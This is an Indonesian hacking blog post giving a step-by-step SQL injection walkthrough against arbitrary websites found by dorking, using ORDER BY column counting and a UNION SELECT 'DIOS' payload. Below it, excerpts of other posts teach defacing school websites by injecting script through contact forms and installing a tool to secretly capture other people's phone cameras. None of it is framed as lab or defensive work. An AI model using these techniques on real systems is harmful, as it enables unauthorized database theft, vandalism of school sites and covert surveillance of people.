SQLI Dios One shoot

-
Assalamualaikum wr.wb
Ketemu lagi dgn saya Rizky
Ok hari ini saya akan membagikan materi.

(SQLI Dios One shoot :v)
-Alat/bahan:
Dios
Dork
Target
Internet
Kopi luwak :v


Ok langsung saja:
1.cari target menggunakan dork vuln,cari di internet banyak disitu
2.Pas nemu web vuln(pas di inject tambahkan tanda petik(') di belakangnya misal https://target/index.php?id=1')nanti akan muncul ERROR Mysql atau sejenisnya
3.kemudian inject(hapus tanda petik lalu tambahkan +order+by+1--+)sampai ERROR kalau 1 gak error jadiiin 2 dan seterusnya sampai ERROR
4.Nanti ketemu errornya misal pas nginject https://target/index.php?id=1+order+by+5--+- (error)berarti tablesnya ada 4 kemudian tambahkan tanda - di belakang angka 1 dan ganti order+by jadi union+select jadinya https:/target/index.php?id=-1+union select+1,2,3,4 (karena cuma memiliki 4 tables)
,Nanti akan ada angka ajaib muncul
5.masukkan Dios di angka ajaib yg muncul misal angka ajaibnya 3 jadinya https://target/index.php?id=-1+union+select+1,2,(Dios),4,5--+-
Duar selamat.
Sekian semoga bermanfaat 😉
Wassalamu'alaikum wr.wb

Komentar

Posting Komentar

Postingan populer dari blog ini

Top 10 hacking tool for hackers

-
Gambar
Assalamualaikum wr.wb Kembali lagi ea mank Langsung aja mank Conntact me? WA: 08987125063 Instagram:  www.instgram.com/rizkyexploit/ 1. Aircrack-ng Aircrack-ng.org adalah program pemecah kunci 802.11 WEP dan WPA-PSK yang dapat menyelesaikan kunci sekali informasi yang cukup mengenai istilah yang dicuri. Itu mengeksekusi serangan FMS standar bersama beberapa perbaikan seperti pelanggaran KoreK, dan juga serangan PTW semua-baru, dengan cara ini membuat serangan itu jauh lebih cepat dibandingkan dengan perangkat pemisahan WEP lainnya. Sebenarnya, Aircrack-ng adalah pengaturan perangkat lunak untuk mengevaluasi sistem jarak jauh. 2. Sqlmap sqlmap adalah perangkat pengujian infiltrasi open source yang merototkan prosedur untuk mengenali dan menyalahgunakan ketidaksempurnaan infus SQL dan dengan asumsi mengendalikan server database. Dukungan penuh untuk MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP...
Baca selengkapnya

Cara deface web sekolah metode JSO

-
Gambar
Assalamualaikum wr.wb Hari ini aenk mau kasih tutorial lagi yaitu cara deface web sekolah metode JSO. Ok langsung aja qimaq Conntact me: WA: 08987125063 Instagram:  www.instagram.com/rizkyexploit/ 1. dork 2.sc jso Dorknya: inurl;/admin/hubungi.php inurl:/bukutamu.html site:sch.id (Dorking biar dapet yg vuln). Pil ih salah satu web yg menurut kalian vuln jika sudah dapat target kalian klik Hubungi kami Nah terus kalian isi bebas aja terserah kalian terus di bagian pesan kalian isi dengan sc JSO kalian. Klo udh klik kirim pesan. Cara aksesnya  https://site.sch.id/[path]/admin/hubungi.php Duar web nya terdeface :v gampang kan awokwokwowk Sekian semoga bermanfaat 😉 tq Wassalamualaikum wr.wb Thanks all.
Baca selengkapnya

Cara sadap kamera orang lain dengan termux

-
Gambar
Assalamualaikum wr.wb Kali ini saya akan memberikan tutorial cara sadap kamera orang lain via termux. Ok langsung saja ke tutorial nya... By: termux.id Conntact me: WA: 08987125063 Instagram:  www.instagram.com/rizkyexploit/ *Pertama lu harus download dulu apk termux nya dulu klo gapunya apk termux nya mau ngapain asu, download nya di playstore... Atau kalian download disini  https://sfile.mobi/b0DXUtfmBq7  udh di download blum asu?... Ok kalo udh ikuti langkah berikut ini simak dengan baik. Untuk melakukan instal Script nya, silakan masukkan command dibawah ini: apt update && apt upgrade  pkg install git pkg install openssh  pkg install bash cd /sdcard  mkdir hackcam  cd hackcam  git clone https://github.com/thelinuxchoice/saycheese  Tunggu hingga proses installasi nya selesai ya tod... Klo udh jalanin sc hack/sadap kamera nya. Masukan command di bawah ini cd saycheese bash saycheese...
Baca selengkapnya